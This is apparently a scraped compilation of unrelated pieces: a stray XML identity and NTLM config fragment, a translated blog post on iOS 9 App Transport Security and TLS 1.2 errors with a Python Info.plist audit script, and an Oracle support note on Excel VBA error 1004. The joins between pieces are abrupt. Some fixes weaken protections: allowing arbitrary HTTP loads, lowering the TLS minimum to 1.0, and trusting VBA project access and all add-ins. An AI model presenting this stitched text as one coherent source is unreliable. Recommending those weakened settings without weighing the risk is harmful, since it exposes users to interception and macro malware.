        <identity>
          <userPrincipalName value="XXX" />
        </identity>

B. Delete this section.
4. Note: this configuration item uses NTLM for authentication. No change is needed when debugging locally; it has to be considered when deploying to the server.
 

iOS development: NSURLSession/NSURLConnection HTTP load failed solution

Recently I have been busy with the launch of the new storage app, for nearly a month. After a period of 996, I can finally take a breath today and continue to update my blog. This post records the problems and solutions encountered when sending an HTTPS request in iOS 9. I hope it gives a deeper understanding of ATS configuration.
Problem description
When developing the app, I encountered this problem when sending an HTTPS request in iOS 9:

NSURLSession/NSURLConnection HTTP load failed (kCFStreamErrorDomainSSL, -9801)

As we know, from iOS 9 on, all network requests use HTTPS by default. If you send an HTTP request, the following error is reported. But we can allow HTTP requests by setting NSAllowsArbitraryLoads under NSAppTransportSecurity to YES:

App Transport Security has blocked a cleartext HTTP (http://) resource load since it is insecure. Temporary exceptions can be configured via your app's Info.plist file.

info.plist

This solves the HTTP request problem, but when I send an HTTPS request, the HTTP load failed problem still occurs. Although the above method can also be used to work around it, it is not the fundamental solution.
The solution
Through analysis, I suspected a TLS problem: iOS 9 requires TLS 1.2 by default to encrypt data, and if the server does not support TLS 1.2, URLSession:task:didCompleteWithError: reports an error. However, my back-end colleagues said that the server supports TLS 1.0, TLS 1.1 and TLS 1.2, so it seemed not to be a TLS problem. I was not convinced, so I used nscurl to test the test server. As expected, TLS 1.2 was not supported.

# --verbose is added to show detailed debugging information
/usr/bin/nscurl --ats-diagnostics --verbose https://testresource.chaoaicai.com

It can be seen from the output that the server only supports TLS 1.0. So I asked my back-end colleagues to check and fix it. After testing again, the server supported TLS 1.2 and HTTPS requests worked normally.

ATS exception configuration
In fact, when the server does not support TLS 1.2 but the client needs to send HTTPS requests, there is another solution: configure ATS and set the minimum TLS version, as shown in Info.plist:

<key>NSAppTransportSecurity</key>
<dict>
  <key>NSExceptionDomains</key>
  <dict>
    <!-- your HTTPS domain -->
    <key>testresource.chaoaicai.com</key>
    <dict>
      <!-- allow subdomains -->
      <key>NSIncludesSubdomains</key>
      <true/>
      <!-- minimum TLS version allowed -->
      <key>NSExceptionMinimumTLSVersion</key>
      <string>TLSv1.0</string>
    </dict>
  </dict>
</dict>

The individual NSExceptionDomains settings are described below, to give a more detailed understanding of ATS:
NSIncludesSubdomains: whether the exception also applies to subdomains; the default is NO
NSExceptionAllowsInsecureHTTPLoads: whether to allow HTTP requests, YES (allow); the default is NO
NSExceptionMinimumTLSVersion: the minimum TLS version
NSExceptionRequiresForwardSecrecy: whether forward secrecy is required, NO (ciphers that do not support PFS, perfect forward secrecy, are allowed); the default is YES
NSRequiresCertificateTransparency: whether a valid signed certificate is required, YES (required); the default is NO


This post only briefly introduces how to configure ATS and solves the problem that HTTPS could not be accessed because the server did not support TLS 1.2. To understand the specific workflow of HTTPS and TLS, please refer to the relevant materials.
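Each of the settings above relaxes a default, so it is worth listing them before a release. The following Python code is an added example, not part of the original post: it parses an Info.plist and reports every ATS exception that weakens the defaults described above. `audit_ats`, the sample plist and the `api.example.test` domain are constructed for the illustration.

```python
import plistlib

TLS_RANK = {"TLSv1.0": 0, "TLSv1.1": 1, "TLSv1.2": 2, "TLSv1.3": 3}


def audit_ats(plist_bytes):
    """Return (scope, key, detail) for every ATS setting that weakens the defaults."""
    ats = plistlib.loads(plist_bytes).get("NSAppTransportSecurity", {})
    findings = []
    if ats.get("NSAllowsArbitraryLoads") is True:
        findings.append(("all domains", "NSAllowsArbitraryLoads",
                         "ATS switched off globally"))
    for domain, rules in ats.get("NSExceptionDomains", {}).items():
        scope = domain + (" and subdomains" if rules.get("NSIncludesSubdomains") else "")
        if rules.get("NSExceptionAllowsInsecureHTTPLoads") is True:
            findings.append((scope, "NSExceptionAllowsInsecureHTTPLoads",
                             "cleartext HTTP allowed"))
        min_tls = rules.get("NSExceptionMinimumTLSVersion")
        if min_tls is not None:
            rank = TLS_RANK.get(min_tls)
            if rank is None:
                findings.append((scope, "NSExceptionMinimumTLSVersion",
                                 f"unrecognised value {min_tls!r}"))
            elif rank < TLS_RANK["TLSv1.2"]:
                findings.append((scope, "NSExceptionMinimumTLSVersion",
                                 f"minimum lowered to {min_tls}"))
        if rules.get("NSExceptionRequiresForwardSecrecy") is False:
            findings.append((scope, "NSExceptionRequiresForwardSecrecy",
                             "forward secrecy not required"))
    return findings


# Constructed Info.plist: the global switch and the TLSv1.0 exception from the post,
# plus one made-up domain that only relaxes forward secrecy
SAMPLE_INFO_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0">
<dict>
  <key>NSAppTransportSecurity</key>
  <dict>
    <key>NSAllowsArbitraryLoads</key>
    <true/>
    <key>NSExceptionDomains</key>
    <dict>
      <key>testresource.chaoaicai.com</key>
      <dict>
        <key>NSIncludesSubdomains</key>
        <true/>
        <key>NSExceptionMinimumTLSVersion</key>
        <string>TLSv1.0</string>
      </dict>
      <key>api.example.test</key>
      <dict>
        <key>NSExceptionMinimumTLSVersion</key>
        <string>TLSv1.2</string>
        <key>NSExceptionRequiresForwardSecrecy</key>
        <false/>
      </dict>
    </dict>
  </dict>
</dict>
</plist>
"""

if __name__ == "__main__":
    for scope, key, detail in audit_ats(SAMPLE_INFO_PLIST):
        print(f"{scope}: {key} ({detail})")
```

Once the server supports TLS 1.2, as happened in this post, both the global switch and the per-domain exception can be removed and the audit returns an empty list.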

Runtime Error 1004 Method ‘VBProject’ of object ‘_Workbook’ failed

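Symptoms

In Enterprise Performance Foundation Administrator, when you try to import dimension members using the "Create from Spreadsheet" button located under "Configuration Rules" > "Dimension" > "Members", the following error occurs when you open WebADI.xls:

Run-time error '1004':

Method 'VBProject' of object '_Workbook' failed

You selected the "Enable Macros" button when opening the spreadsheet. In addition, in Excel 2003, if you open "Tools" > "Macro" > "Security…", the security level is "Medium".

Solution

In Excel 2003, go to "Tools" > "Macro" > "Security" and select the "Trusted Sources" tab. Check the box next to "Trust access to Visual Basic Project".

(Note: the "Trust all installed add-ins and templates" box should also be checked.)
In Excel 2007, use the following navigation:

    Click the Office button in the upper left corner
    Click the Excel Options button
    On the left, click Trust Center
    Click the Trust Center Settings button
    On the left, click Macro Settings
    Click "Trust access to the VBA project object model"

    Reprinted from: https://support.oracle.com/CSP/main/article?cmd=show&type=NOT&id=376013.1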